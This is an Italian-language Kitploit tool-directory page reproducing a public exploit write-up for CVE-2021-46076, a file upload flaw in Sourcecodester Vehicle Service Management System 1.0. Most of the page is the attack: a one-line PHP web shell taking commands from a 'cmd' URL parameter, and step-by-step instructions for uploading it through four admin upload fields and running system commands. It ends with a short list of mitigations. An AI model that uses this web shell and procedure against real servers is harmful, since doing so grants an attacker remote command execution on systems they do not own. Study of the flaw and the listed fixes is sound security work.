Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-46076 — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 è vulnerabile al caricamento di file. Un attaccante può caricare un file php dannoso in molteplici endpoint, portando all'esecuzione di codice. | Kitploit
Strumenti/GitHubGitHub/sanupl/cve-2021-46076
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsanupl/cve-2021-46076

CVE-2021-46076

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 è vulnerabile al caricamento di file. Un attaccante può caricare un file php dannoso in molteplici endpoint, portando all'esecuzione di codice.

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-46076

Exploit Title: Vehicle Service Management System - Caricamento multiplo di file porta all'esecuzione di codice

Exploit Author: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 HIGH

Riferimenti:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

Descrizione:

Sourcecodester Vehicle Service Management System 1.0 è vulnerabile al caricamento di file. Un attaccante può caricare un file php malevolo su più endpoint, portando all'esecuzione di codice.

1. Vehicle Service Management System - 'Il mio account' (/admin/?page=user)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Il mio account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salva il codice php di cui sopra, ad esempio Cmd.php
  2. Nella sezione Il mio account inserisci tutti i dettagli richiesti e seleziona il file php in Avatar.
  3. Fai clic sul pulsante Aggiorna.
  4. Apri l'immagine dell'avatar in una nuova scheda.
  5. Aggiungi il parametro cmd all'URL ed esegui i comandi.
  6. URL finale: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Esegui tutti i comandi di sistema, ad esempio: id, whoami, pwd, ecc.

2. Vehicle Service Management System - 'Elenco utenti' (/admin/?page=user/manage_user)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Elenco utenti e fai clic sul pulsante Crea nuovo.

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salva il codice php di cui sopra, ad esempio Cmd.php
  2. Nella pagina Crea nuovo utente inserisci tutti i dettagli richiesti e seleziona il file php in Avatar.
  3. Fai clic sul pulsante Salva.
  4. Apri l'immagine dell'avatar in una nuova scheda.
  5. Aggiungi il parametro cmd all'URL ed esegui i comandi.
  6. URL finale: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Esegui tutti i comandi di sistema, ad esempio: id, whoami, pwd, ecc.

3. Vehicle Service Management System - 'Impostazioni-Logo di sistema' (/admin/?page=system_info)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Impostazioni http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salva il codice php di cui sopra, ad esempio Cmd.php
  2. Nella sezione Impostazioni inserisci tutti i dettagli richiesti e seleziona il file php in Logo di sistema.
  3. Fai clic sul pulsante Aggiorna.
  4. Apri l'immagine del Logo di sistema in una nuova scheda.
  5. Aggiungi il parametro cmd all'URL ed esegui i comandi.
  6. URL finale: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Esegui tutti i comandi di sistema, ad esempio: id, whoami, pwd, ecc.

4. Vehicle Service Management System - 'Impostazioni-Copertina del sito web' (/admin/?page=system_info)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Impostazioni http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salva il codice php di cui sopra, ad esempio Cmd.php
  2. Nella sezione Impostazioni inserisci tutti i dettagli richiesti e seleziona il file php in Copertina del sito web.
  3. Fai clic sul pulsante Aggiorna.
  4. Apri l'immagine della Copertina del sito web in una nuova scheda.
  5. Aggiungi il parametro cmd all'URL ed esegui i comandi.
  6. URL finale: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Esegui tutti i comandi di sistema, ad esempio: id, whoami, pwd, ecc.

Impatto:

Un attaccante può caricare un file php malevolo su più endpoint, portando all'esecuzione di codice.

Mitigazione:

Si raccomanda di implementare quanto segue:

  • Non accettare mai un nome file e la sua estensione direttamente senza un filtro di whitelist.
  • Se non è necessario avere caratteri Unicode, è altamente consigliato accettare solo caratteri alfanumerici e un solo punto come input per il nome del file e l'estensione.
  • Limita la dimensione del file a un valore massimo per prevenire attacchi di denial of service.
  • La directory di upload non dovrebbe avere alcun permesso di "esecuzione".
  • Non affidarti solo alla validazione lato client.
Scarica lo strumento